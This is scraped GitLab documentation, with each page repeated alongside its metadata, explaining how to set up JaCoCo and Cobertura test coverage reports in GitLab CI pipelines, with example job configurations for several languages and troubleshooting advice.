add a coverage badge to your project, see [test coverage report badges](../../../user/project/badges.md#test-coverage-report-badges). ## Troubleshooting ### Remove color codes from code coverage Some test coverage tools output with ANSI color codes that aren't parsed correctly by the regular expression. This causes coverage parsing to fail. Some coverage tools do not provide an option to disable color codes in the output. If so, pipe the output of the coverage tool through a one-line script that strips the color codes. For example: ```shell lein cloverage | perl -pe 's/\e\[?.*?[\@-~]//g' ```
https://docs.gitlab.com/ci/testing/jacoco
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/testing/jacoco.md
2025-08-13
doc/ci/testing/code_coverage
[ "doc", "ci", "testing", "code_coverage" ]
jacoco.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
JaCoCo coverage report
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/227345) in GitLab 17.3 [with a flag](../../../administration/feature_flags/_index.md) named `jacoco_coverage_reports`. Disabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/170513) in GitLab 17.6. Feature flag `jacoco_coverage_reports` removed. {{< /history >}} [Leave your feedback](https://gitlab.com/gitlab-org/gitlab/-/issues/479804) For JaCoCo coverage reports to work, you must generate a properly formatted [JaCoCo XML file](https://www.jacoco.org/jacoco/trunk/coverage/jacoco.xml) that provides [line coverage](https://www.eclemma.org/jacoco/trunk/doc/counters.html). The JaCoCo coverage reports visualization supports: - [Instructions (C0 Coverage)](https://www.eclemma.org/jacoco/trunk/doc/counters.html), `ci` (covered instructions) in reports. Coverage information displays in the merge request diff view with these indicators: - Instructions covered (green): Lines with at least one covered instruction (`ci > 0`) - No instructions covered (red): Lines without any covered instructions (`ci = 0`) - No coverage information: Lines not included in the coverage report For example, with this report output: ```xml <line nr="83" mi="2" ci="0" mb="0" cb="0"/> <line nr="84" mi="2" ci="0" mb="0" cb="0"/> <line nr="85" mi="2" ci="0" mb="0" cb="0"/> <line nr="86" mi="2" ci="0" mb="0" cb="0"/> <line nr="88" mi="0" ci="7" mb="0" cb="1"/> ``` The merge request diff view displays coverage as follows: ![Merge request diff view showing coverage indicators with red bars for uncovered lines and green bars for covered lines.](img/jacoco_coverage_example_v18_3.png) In this example, lines 83-86 show red bars for uncovered code, line 88 shows a green bar for covered code, and lines 87, 89-90 have no coverage data. ## Add JaCoCo coverage job To configure your pipeline to generate the coverage reports, add a job to your `.gitlab-ci.yml` file. For example: ```yaml test-jdk11: stage: test image: maven:3.6.3-jdk-11 script: - mvn $MAVEN_CLI_OPTS clean org.jacoco:jacoco-maven-plugin:prepare-agent test jacoco:report artifacts: reports: coverage_report: coverage_format: jacoco path: target/site/jacoco/jacoco.xml ``` In this example, the `mvn` command generates the JaCoCo coverage report. The `path` points to the generated report. If the job generates multiple reports, [use a wildcard in the artifact path](_index.md#configure-coverage-visualization). ## Relative File Paths Correction ## File path conversion JaCoCo reports provide relative file paths but coverage report visualizations require absolute paths. GitLab attempts to convert the relative paths to absolute paths, using data from the related merge requests. The path matching process is: 1. Find all the merge requests for the same pipeline ref. 1. For all the files that changed, find all the absolute paths. 1. For each relative path in the report, use the first matching absolute path. This process might not always be able to find a suitable matching absolute path. ### Multiple modules or source directories With identical file names for multiple modules or source directories, it might not be possible to find the absolute path by default. For example, GitLab cannot find the absolute paths if these files are changed in a merge request: - `src/main/java/org/acme/DemoExample.java` - `src/main/other-module/org/acme/DemoExample.java` For path conversion to succeed, you must have some unique difference in the relative paths. For example, you can change one of the file or directory names: - Change the filename: ```diff src/main/java/org/acme/DemoExample.java - src/main/other-module/org/acme/DemoExample.java + src/main/other-module/org/acme/OtherDemoExample.java ``` - Change the path: ```diff src/main/java/org/acme/DemoExample.java - src/main/other-module/org/acme/DemoExample.java + src/main/other-module/org/other-acme/DemoExample.java ``` You can also add a new directory, as long as the complete relative path is unique. ## Troubleshooting ### Metrics do not display for all changed files Metrics might not display correctly if you create a new merge request from the same source branch, but with a different target branch. The job doesn't consider the diffs from the new merge request and doesn't display any metrics for files not contained in the diff of the other merge request. This happens even when the generated coverage report contain metrics for the specified file. To fix this issue, wait until the new merge request is created, then rerun your pipeline or start a new one. Then the new merge request is taken into account.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: JaCoCo coverage report breadcrumbs: - doc - ci - testing - code_coverage --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/227345) in GitLab 17.3 [with a flag](../../../administration/feature_flags/_index.md) named `jacoco_coverage_reports`. Disabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/170513) in GitLab 17.6. Feature flag `jacoco_coverage_reports` removed. {{< /history >}} [Leave your feedback](https://gitlab.com/gitlab-org/gitlab/-/issues/479804) For JaCoCo coverage reports to work, you must generate a properly formatted [JaCoCo XML file](https://www.jacoco.org/jacoco/trunk/coverage/jacoco.xml) that provides [line coverage](https://www.eclemma.org/jacoco/trunk/doc/counters.html). The JaCoCo coverage reports visualization supports: - [Instructions (C0 Coverage)](https://www.eclemma.org/jacoco/trunk/doc/counters.html), `ci` (covered instructions) in reports. Coverage information displays in the merge request diff view with these indicators: - Instructions covered (green): Lines with at least one covered instruction (`ci > 0`) - No instructions covered (red): Lines without any covered instructions (`ci = 0`) - No coverage information: Lines not included in the coverage report For example, with this report output: ```xml <line nr="83" mi="2" ci="0" mb="0" cb="0"/> <line nr="84" mi="2" ci="0" mb="0" cb="0"/> <line nr="85" mi="2" ci="0" mb="0" cb="0"/> <line nr="86" mi="2" ci="0" mb="0" cb="0"/> <line nr="88" mi="0" ci="7" mb="0" cb="1"/> ``` The merge request diff view displays coverage as follows: ![Merge request diff view showing coverage indicators with red bars for uncovered lines and green bars for covered lines.](img/jacoco_coverage_example_v18_3.png) In this example, lines 83-86 show red bars for uncovered code, line 88 shows a green bar for covered code, and lines 87, 89-90 have no coverage data. ## Add JaCoCo coverage job To configure your pipeline to generate the coverage reports, add a job to your `.gitlab-ci.yml` file. For example: ```yaml test-jdk11: stage: test image: maven:3.6.3-jdk-11 script: - mvn $MAVEN_CLI_OPTS clean org.jacoco:jacoco-maven-plugin:prepare-agent test jacoco:report artifacts: reports: coverage_report: coverage_format: jacoco path: target/site/jacoco/jacoco.xml ``` In this example, the `mvn` command generates the JaCoCo coverage report. The `path` points to the generated report. If the job generates multiple reports, [use a wildcard in the artifact path](_index.md#configure-coverage-visualization). ## Relative File Paths Correction ## File path conversion JaCoCo reports provide relative file paths but coverage report visualizations require absolute paths. GitLab attempts to convert the relative paths to absolute paths, using data from the related merge requests. The path matching process is: 1. Find all the merge requests for the same pipeline ref. 1. For all the files that changed, find all the absolute paths. 1. For each relative path in the report, use the first matching absolute path. This process might not always be able to find a suitable matching absolute path. ### Multiple modules or source directories With identical file names for multiple modules or source directories, it might not be possible to find the absolute path by default. For example, GitLab cannot find the absolute paths if these files are changed in a merge request: - `src/main/java/org/acme/DemoExample.java` - `src/main/other-module/org/acme/DemoExample.java` For path conversion to succeed, you must have some unique difference in the relative paths. For example, you can change one of the file or directory names: - Change the filename: ```diff src/main/java/org/acme/DemoExample.java - src/main/other-module/org/acme/DemoExample.java + src/main/other-module/org/acme/OtherDemoExample.java ``` - Change the path: ```diff src/main/java/org/acme/DemoExample.java - src/main/other-module/org/acme/DemoExample.java + src/main/other-module/org/other-acme/DemoExample.java ``` You can also add a new directory, as long as the complete relative path is unique. ## Troubleshooting ### Metrics do not display for all changed files Metrics might not display correctly if you create a new merge request from the same source branch, but with a different target branch. The job doesn't consider the diffs from the new merge request and doesn't display any metrics for files not contained in the diff of the other merge request. This happens even when the generated coverage report contain metrics for the specified file. To fix this issue, wait until the new merge request is created, then rerun your pipeline or start a new one. Then the new merge request is taken into account.
https://docs.gitlab.com/ci/testing/cobertura
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/testing/cobertura.md
2025-08-13
doc/ci/testing/code_coverage
[ "doc", "ci", "testing", "code_coverage" ]
cobertura.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Cobertura coverage report
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} For the coverage analysis to work, you have to provide a properly formatted [Cobertura XML](https://cobertura.github.io/cobertura/) report to [`artifacts:reports:coverage_report`](../../yaml/artifacts_reports.md#artifactsreportscoverage_report). This format was originally developed for Java, but most coverage analysis frameworks for other languages and platforms have plugins to add support for it, like: - [simplecov-cobertura](https://rubygems.org/gems/simplecov-cobertura) (Ruby) - [gocover-cobertura](https://github.com/boumenot/gocover-cobertura) (Go) - [cobertura](https://www.npmjs.com/package/cobertura) (Node.js) Other coverage analysis frameworks support the format out of the box, for example: - [Istanbul](https://istanbul.js.org/docs/advanced/alternative-reporters/#cobertura) (JavaScript) - [Coverage.py](https://coverage.readthedocs.io/en/coverage-5.0.4/cmd.html#xml-reporting) (Python) - [PHPUnit](https://github.com/sebastianbergmann/phpunit-documentation-english/blob/master/src/textui.rst#command-line-options) (PHP) After configuration, if your merge request triggers a pipeline that collects coverage reports, the coverage information is displayed in the diff view. This includes reports from any job in any stage in the pipeline. The coverage displays for each line: - `covered` (green): lines which have been checked at least once by tests - `no test coverage` (orange): lines which are loaded but never executed - no coverage information: lines which are non-instrumented or not loaded Hovering over the coverage bar provides further information, such as the number of times the line was checked by tests. Uploading a test coverage report does not enable: - [Test coverage results](_index.md#view-coverage-results) in the merge request widget. - [Code coverage history](_index.md#view-coverage-history). You must configure these separately. ## Limits A limit of 100 `<source>` nodes for Cobertura format XML files applies. If your Cobertura report exceeds 100 nodes, there can be mismatches or no matches in the merge request diff view. A single Cobertura XML file can be no more than 10 MiB. For large projects, split the Cobertura XML into smaller files. See [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/328772) for more details. When submitting many files, it can take a few minutes for coverage to show on a merge request. The visualization only displays after the pipeline is complete. If the pipeline has a [blocking manual job](../../jobs/job_control.md#types-of-manual-jobs), the pipeline waits for the manual job before continuing and is not considered complete. The visualization cannot be displayed if the blocking manual job did not run. If the job generates multiple reports, [use a wildcard in the artifact path](_index.md#configure-coverage-visualization). ### Automatic class path correction The coverage report properly matches changed files only if the `filename` of a `class` element contains the full path relative to the project root. However, in some coverage analysis frameworks, the generated Cobertura XML has the `filename` path relative to the class package directory instead. To make an intelligent guess on the project root relative `class` path, the Cobertura XML parser attempts to build the full path by: - Extracting a portion of the `source` paths from the `sources` element and combining them with the class `filename` path. - Checking if the candidate path exists in the project. - Using the first candidate that matches as the class full path. #### Path correction example As an example, a C# project with: - A full path of `test-org/test-cs-project`. - The following files relative to the project root: ```shell Auth/User.cs Lib/Utils/User.cs ``` - `sources` from Cobertura XML, the following paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`: ```xml <sources> <source>/builds/test-org/test-cs-project/Auth</source> <source>/builds/test-org/test-cs-project/Lib/Utils</source> </sources> ``` The parser: - Extracts `Auth` and `Lib/Utils` from the `sources` and uses these to determine the `class` path relative to the project root. - Combines these extracted `sources` and the class filename. For example, if there is a `class` element with the `filename` value of `User.cs`, the parser takes the first candidate path that matches, which is `Auth/User.cs`. - For each `class` element, attempts to look for a match for each extracted `source` path up to 100 iterations. If it reaches this limit without finding a matching path in the file tree, the class is not included in the final coverage report. Automatic class path correction also works for a Java project with: - A full path of `test-org/test-java-project`. - The following files relative to the project root: ```shell src/main/java/com/gitlab/security_products/tests/App.java ``` - `sources` from Cobertura XML: ```xml <sources> <source>/builds/test-org/test-java-project/src/main/java/</source> </sources> ``` - `class` element with the `filename` value of `com/gitlab/security_products/tests/App.java`: ```xml <class name="com.gitlab.security_products.tests.App" filename="com/gitlab/security_products/tests/App.java" line-rate="0.0" branch-rate="0.0" complexity="6.0"> ``` {{< alert type="note" >}} Automatic class path correction only works on `source` paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`. The `source` is ignored if the path does not follow this pattern. The parser assumes that the `filename` of a `class` element contains the full path relative to the project root. {{< /alert >}} ## Example test coverage configurations This section provides test coverage configuration examples for different programming languages. You can also see a working example in the [`coverage-report`](https://gitlab.com/gitlab-org/ci-sample-projects/coverage-report/) demonstration project. ### JavaScript example The following `.gitlab-ci.yml` example uses [Mocha](https://mochajs.org/) JavaScript testing and [nyc](https://github.com/istanbuljs/nyc) coverage-tooling to generate the coverage artifact: ```yaml test: script: - npm install - npx nyc --reporter cobertura mocha artifacts: reports: coverage_report: coverage_format: cobertura path: coverage/cobertura-coverage.xml ``` ### Java and Kotlin examples The Maven and Gradle examples convert JaCoCo reports into Cobertura format. Alternatively, [issue 227345](https://gitlab.com/gitlab-org/gitlab/-/issues/227345) tracks the work to enable [native JaCoCo report support](jacoco.md). #### Maven example The following `.gitlab-ci.yml` example for Java or Kotlin uses [Maven](https://maven.apache.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. GitLab expects the artifact in the Cobertura format, so you have to execute a few scripts before uploading it. The `test-jdk11` job tests the code and generates an XML artifact. The `coverage-jdk-11` job converts the artifact into a Cobertura report: ```yaml test-jdk11: stage: test image: maven:3.6.3-jdk-11 script: - mvn $MAVEN_CLI_OPTS clean org.jacoco:jacoco-maven-plugin:prepare-agent test jacoco:report artifacts: paths: - target/site/jacoco/jacoco.xml coverage-jdk11: # Must be in a stage later than test-jdk11's stage. # The `visualize` stage does not exist by default. # Please define it first, or choose an existing stage like `deploy`. stage: visualize image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.9 script: # convert report from jacoco to cobertura, using relative project path - python /opt/cover2cover.py target/site/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > target/site/cobertura.xml needs: ["test-jdk11"] artifacts: reports: coverage_report: coverage_format: cobertura path: target/site/cobertura.xml ``` #### Gradle example The following `.gitlab-ci.yml` example for Java or Kotlin uses [Gradle](https://gradle.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. GitLab expects the artifact in the Cobertura format, so you have to execute a few scripts before uploading it. The `test-jdk11` job tests the code and generates an XML artifact. The `coverage-jdk-11` job converts the artifact into a Cobertura report: ```yaml test-jdk11: stage: test image: gradle:6.6.1-jdk11 script: - 'gradle test jacocoTestReport' # jacoco must be configured to create an xml report artifacts: paths: - build/jacoco/jacoco.xml coverage-jdk11: # Must be in a stage later than test-jdk11's stage. # The `visualize` stage does not exist by default. # Please define it first, or chose an existing stage like `deploy`. stage: visualize image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.7 script: # convert report from jacoco to cobertura, using relative project path - python /opt/cover2cover.py build/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > build/cobertura.xml needs: ["test-jdk11"] artifacts: reports: coverage_report: coverage_format: cobertura path: build/cobertura.xml ``` ### Python example The following `.gitlab-ci.yml` example uses [pytest-cov](https://pytest-cov.readthedocs.io/) to collect test coverage data: ```yaml run tests: stage: test image: python:3 script: - pip install pytest pytest-cov - pytest --cov --cov-report term --cov-report xml:coverage.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.xml ``` ### PHP example The following `.gitlab-ci.yml` example for PHP uses [PHPUnit](https://phpunit.readthedocs.io/) to collect test coverage data and generate the report. With a minimal [`phpunit.xml`](https://docs.phpunit.de/en/11.0/configuration.html) file (you may reference [this example repository](https://gitlab.com/yookoala/code-coverage-visualization-with-php/)), you can run the test and generate the `coverage.xml`: ```yaml run tests: stage: test image: php:latest variables: XDEBUG_MODE: coverage before_script: - apt-get update && apt-get -yq install git unzip zip libzip-dev zlib1g-dev - docker-php-ext-install zip - pecl install xdebug && docker-php-ext-enable xdebug - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php composer-setup.php --install-dir=/usr/local/bin --filename=composer - composer install - composer require --dev phpunit/phpunit phpunit/php-code-coverage script: - php ./vendor/bin/phpunit --coverage-text --coverage-cobertura=coverage.cobertura.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.cobertura.xml ``` [Codeception](https://codeception.com/), through PHPUnit, also supports generating Cobertura report with [`run`](https://codeception.com/docs/reference/Commands#run). The path for the generated file depends on the `--coverage-cobertura` option and [`paths`](https://codeception.com/docs/reference/Configuration#paths) configuration for the [unit test suite](https://codeception.com/docs/05-UnitTests). Configure `.gitlab-ci.yml` to find Cobertura in the appropriate path. ### C/C++ example The following `.gitlab-ci.yml` example for C/C++ with `gcc` or `g++` as the compiler uses [`gcovr`](https://gcovr.com/en/stable/) to generate the coverage output file in Cobertura XML format. This example assumes: - That the `Makefile` is created by `cmake` in the `build` directory, in another job in a previous stage. (If you use `automake` to generate the `Makefile`, then you need to call `make check` instead of `make test`.) - `cmake` (or `automake`) has set the compiler option `--coverage`. ```yaml run tests: stage: test script: - cd build - make test - gcovr --xml-pretty --exclude-unreachable-branches --print-summary -o coverage.xml --root ${CI_PROJECT_DIR} artifacts: name: ${CI_JOB_NAME}-${CI_COMMIT_REF_NAME}-${CI_COMMIT_SHA} expire_in: 2 days reports: coverage_report: coverage_format: cobertura path: build/coverage.xml ``` ### Go example The following `.gitlab-ci.yml` example for Go uses: - [`go test`](https://go.dev/doc/tutorial/add-a-test) to run tests. - [`gocover-cobertura`](https://github.com/boumenot/gocover-cobertura) to convert Go's coverage profile into the Cobertura XML format. This example assumes that [Go modules](https://go.dev/ref/mod) are being used. The `-covermode count` option does not work with the `-race` flag. If you want to generate code coverage while also using the `-race` flag, you must switch to `-covermode atomic` which is slower than `-covermode count`. See [this blog post](https://go.dev/blog/cover) for more details. ```yaml run tests: stage: test image: golang:1.17 script: - go install - go test ./... -coverprofile=coverage.txt -covermode count - go get github.com/boumenot/gocover-cobertura - go run github.com/boumenot/gocover-cobertura < coverage.txt > coverage.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.xml ``` ### Ruby example The following `.gitlab-ci.yml` example for Ruby uses - [`rspec`](https://rspec.info/) to run tests. - [`simplecov`](https://github.com/simplecov-ruby/simplecov) and [`simplecov-cobertura`](https://github.com/dashingrocket/simplecov-cobertura) to record the coverage profile and create a report in the Cobertura XML format. This example assumes: - That [`bundler`](https://bundler.io/) is being used for dependency management. The `rspec`, `simplecov` and `simplecov-cobertura` gems have been added to your `Gemfile`. - The `CoberturaFormatter` has been added to your `SimpleCov.formatters` configuration in the `spec_helper.rb` file. ```yaml run tests: stage: test image: ruby:3.1 script: - bundle install - bundle exec rspec artifacts: reports: coverage_report: coverage_format: cobertura path: coverage/coverage.xml ``` ## Troubleshooting ### Test coverage visualization not displayed If the test coverage visualization is not displayed in the diff view, you can check the coverage report itself and verify that: - The file you are viewing in the diff view is mentioned in the coverage report. - The `source` and `filename` nodes in the report follows the [expected structure](#automatic-class-path-correction) to match the files in your repository. - The pipeline has completed. If the pipeline is [blocked on a manual job](../../jobs/job_control.md#types-of-manual-jobs), the pipeline is not considered complete. - The coverage report file does not exceed the [limits](#limits). Report artifacts are not downloadable by default. If you want the report to be downloadable from the job details page, add your coverage report to the artifact `paths`: ```yaml artifacts: paths: - coverage/cobertura-coverage.xml reports: coverage_report: coverage_format: cobertura path: coverage/cobertura-coverage.xml ```
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Cobertura coverage report breadcrumbs: - doc - ci - testing - code_coverage --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} For the coverage analysis to work, you have to provide a properly formatted [Cobertura XML](https://cobertura.github.io/cobertura/) report to [`artifacts:reports:coverage_report`](../../yaml/artifacts_reports.md#artifactsreportscoverage_report). This format was originally developed for Java, but most coverage analysis frameworks for other languages and platforms have plugins to add support for it, like: - [simplecov-cobertura](https://rubygems.org/gems/simplecov-cobertura) (Ruby) - [gocover-cobertura](https://github.com/boumenot/gocover-cobertura) (Go) - [cobertura](https://www.npmjs.com/package/cobertura) (Node.js) Other coverage analysis frameworks support the format out of the box, for example: - [Istanbul](https://istanbul.js.org/docs/advanced/alternative-reporters/#cobertura) (JavaScript) - [Coverage.py](https://coverage.readthedocs.io/en/coverage-5.0.4/cmd.html#xml-reporting) (Python) - [PHPUnit](https://github.com/sebastianbergmann/phpunit-documentation-english/blob/master/src/textui.rst#command-line-options) (PHP) After configuration, if your merge request triggers a pipeline that collects coverage reports, the coverage information is displayed in the diff view. This includes reports from any job in any stage in the pipeline. The coverage displays for each line: - `covered` (green): lines which have been checked at least once by tests - `no test coverage` (orange): lines which are loaded but never executed - no coverage information: lines which are non-instrumented or not loaded Hovering over the coverage bar provides further information, such as the number of times the line was checked by tests. Uploading a test coverage report does not enable: - [Test coverage results](_index.md#view-coverage-results) in the merge request widget. - [Code coverage history](_index.md#view-coverage-history). You must configure these separately. ## Limits A limit of 100 `<source>` nodes for Cobertura format XML files applies. If your Cobertura report exceeds 100 nodes, there can be mismatches or no matches in the merge request diff view. A single Cobertura XML file can be no more than 10 MiB. For large projects, split the Cobertura XML into smaller files. See [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/328772) for more details. When submitting many files, it can take a few minutes for coverage to show on a merge request. The visualization only displays after the pipeline is complete. If the pipeline has a [blocking manual job](../../jobs/job_control.md#types-of-manual-jobs), the pipeline waits for the manual job before continuing and is not considered complete. The visualization cannot be displayed if the blocking manual job did not run. If the job generates multiple reports, [use a wildcard in the artifact path](_index.md#configure-coverage-visualization). ### Automatic class path correction The coverage report properly matches changed files only if the `filename` of a `class` element contains the full path relative to the project root. However, in some coverage analysis frameworks, the generated Cobertura XML has the `filename` path relative to the class package directory instead. To make an intelligent guess on the project root relative `class` path, the Cobertura XML parser attempts to build the full path by: - Extracting a portion of the `source` paths from the `sources` element and combining them with the class `filename` path. - Checking if the candidate path exists in the project. - Using the first candidate that matches as the class full path. #### Path correction example As an example, a C# project with: - A full path of `test-org/test-cs-project`. - The following files relative to the project root: ```shell Auth/User.cs Lib/Utils/User.cs ``` - `sources` from Cobertura XML, the following paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`: ```xml <sources> <source>/builds/test-org/test-cs-project/Auth</source> <source>/builds/test-org/test-cs-project/Lib/Utils</source> </sources> ``` The parser: - Extracts `Auth` and `Lib/Utils` from the `sources` and uses these to determine the `class` path relative to the project root. - Combines these extracted `sources` and the class filename. For example, if there is a `class` element with the `filename` value of `User.cs`, the parser takes the first candidate path that matches, which is `Auth/User.cs`. - For each `class` element, attempts to look for a match for each extracted `source` path up to 100 iterations. If it reaches this limit without finding a matching path in the file tree, the class is not included in the final coverage report. Automatic class path correction also works for a Java project with: - A full path of `test-org/test-java-project`. - The following files relative to the project root: ```shell src/main/java/com/gitlab/security_products/tests/App.java ``` - `sources` from Cobertura XML: ```xml <sources> <source>/builds/test-org/test-java-project/src/main/java/</source> </sources> ``` - `class` element with the `filename` value of `com/gitlab/security_products/tests/App.java`: ```xml <class name="com.gitlab.security_products.tests.App" filename="com/gitlab/security_products/tests/App.java" line-rate="0.0" branch-rate="0.0" complexity="6.0"> ``` {{< alert type="note" >}} Automatic class path correction only works on `source` paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`. The `source` is ignored if the path does not follow this pattern. The parser assumes that the `filename` of a `class` element contains the full path relative to the project root. {{< /alert >}} ## Example test coverage configurations This section provides test coverage configuration examples for different programming languages. You can also see a working example in the [`coverage-report`](https://gitlab.com/gitlab-org/ci-sample-projects/coverage-report/) demonstration project. ### JavaScript example The following `.gitlab-ci.yml` example uses [Mocha](https://mochajs.org/) JavaScript testing and [nyc](https://github.com/istanbuljs/nyc) coverage-tooling to generate the coverage artifact: ```yaml test: script: - npm install - npx nyc --reporter cobertura mocha artifacts: reports: coverage_report: coverage_format: cobertura path: coverage/cobertura-coverage.xml ``` ### Java and Kotlin examples The Maven and Gradle examples convert JaCoCo reports into Cobertura format. Alternatively, [issue 227345](https://gitlab.com/gitlab-org/gitlab/-/issues/227345) tracks the work to enable [native JaCoCo report support](jacoco.md). #### Maven example The following `.gitlab-ci.yml` example for Java or Kotlin uses [Maven](https://maven.apache.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. GitLab expects the artifact in the Cobertura format, so you have to execute a few scripts before uploading it. The `test-jdk11` job tests the code and generates an XML artifact. The `coverage-jdk-11` job converts the artifact into a Cobertura report: ```yaml test-jdk11: stage: test image: maven:3.6.3-jdk-11 script: - mvn $MAVEN_CLI_OPTS clean org.jacoco:jacoco-maven-plugin:prepare-agent test jacoco:report artifacts: paths: - target/site/jacoco/jacoco.xml coverage-jdk11: # Must be in a stage later than test-jdk11's stage. # The `visualize` stage does not exist by default. # Please define it first, or choose an existing stage like `deploy`. stage: visualize image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.9 script: # convert report from jacoco to cobertura, using relative project path - python /opt/cover2cover.py target/site/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > target/site/cobertura.xml needs: ["test-jdk11"] artifacts: reports: coverage_report: coverage_format: cobertura path: target/site/cobertura.xml ``` #### Gradle example The following `.gitlab-ci.yml` example for Java or Kotlin uses [Gradle](https://gradle.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. GitLab expects the artifact in the Cobertura format, so you have to execute a few scripts before uploading it. The `test-jdk11` job tests the code and generates an XML artifact. The `coverage-jdk-11` job converts the artifact into a Cobertura report: ```yaml test-jdk11: stage: test image: gradle:6.6.1-jdk11 script: - 'gradle test jacocoTestReport' # jacoco must be configured to create an xml report artifacts: paths: - build/jacoco/jacoco.xml coverage-jdk11: # Must be in a stage later than test-jdk11's stage. # The `visualize` stage does not exist by default. # Please define it first, or chose an existing stage like `deploy`. stage: visualize image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.7 script: # convert report from jacoco to cobertura, using relative project path - python /opt/cover2cover.py build/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > build/cobertura.xml needs: ["test-jdk11"] artifacts: reports: coverage_report: coverage_format: cobertura path: build/cobertura.xml ``` ### Python example The following `.gitlab-ci.yml` example uses [pytest-cov](https://pytest-cov.readthedocs.io/) to collect test coverage data: ```yaml run tests: stage: test image: python:3 script: - pip install pytest pytest-cov - pytest --cov --cov-report term --cov-report xml:coverage.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.xml ``` ### PHP example The following `.gitlab-ci.yml` example for PHP uses [PHPUnit](https://phpunit.readthedocs.io/) to collect test coverage data and generate the report. With a minimal [`phpunit.xml`](https://docs.phpunit.de/en/11.0/configuration.html) file (you may reference [this example repository](https://gitlab.com/yookoala/code-coverage-visualization-with-php/)), you can run the test and generate the `coverage.xml`: ```yaml run tests: stage: test image: php:latest variables: XDEBUG_MODE: coverage before_script: - apt-get update && apt-get -yq install git unzip zip libzip-dev zlib1g-dev - docker-php-ext-install zip - pecl install xdebug && docker-php-ext-enable xdebug - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php composer-setup.php --install-dir=/usr/local/bin --filename=composer - composer install - composer require --dev phpunit/phpunit phpunit/php-code-coverage script: - php ./vendor/bin/phpunit --coverage-text --coverage-cobertura=coverage.cobertura.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.cobertura.xml ``` [Codeception](https://codeception.com/), through PHPUnit, also supports generating Cobertura report with [`run`](https://codeception.com/docs/reference/Commands#run). The path for the generated file depends on the `--coverage-cobertura` option and [`paths`](https://codeception.com/docs/reference/Configuration#paths) configuration for the [unit test suite](https://codeception.com/docs/05-UnitTests). Configure `.gitlab-ci.yml` to find Cobertura in the appropriate path. ### C/C++ example The following `.gitlab-ci.yml` example for C/C++ with `gcc` or `g++` as the compiler uses [`gcovr`](https://gcovr.com/en/stable/) to generate the coverage output file in Cobertura XML format. This example assumes: - That the `Makefile` is created by `cmake` in the `build` directory, in another job in a previous stage. (If you use `automake` to generate the `Makefile`, then you need to call `make check` instead of `make test`.) - `cmake` (or `automake`) has set the compiler option `--coverage`. ```yaml run tests: stage: test script: - cd build - make test - gcovr --xml-pretty --exclude-unreachable-branches --print-summary -o coverage.xml --root ${CI_PROJECT_DIR} artifacts: name: ${CI_JOB_NAME}-${CI_COMMIT_REF_NAME}-${CI_COMMIT_SHA} expire_in: 2 days reports: coverage_report: coverage_format: cobertura path: build/coverage.xml ``` ### Go example The following `.gitlab-ci.yml` example for Go uses: - [`go test`](https://go.dev/doc/tutorial/add-a-test) to run tests. - [`gocover-cobertura`](https://github.com/boumenot/gocover-cobertura) to convert Go's coverage profile into the Cobertura XML format. This example assumes that [Go modules](https://go.dev/ref/mod) are being used. The `-covermode count` option does not work with the `-race` flag. If you want to generate code coverage while also using the `-race` flag, you must switch to `-covermode atomic` which is slower than `-covermode count`. See [this blog 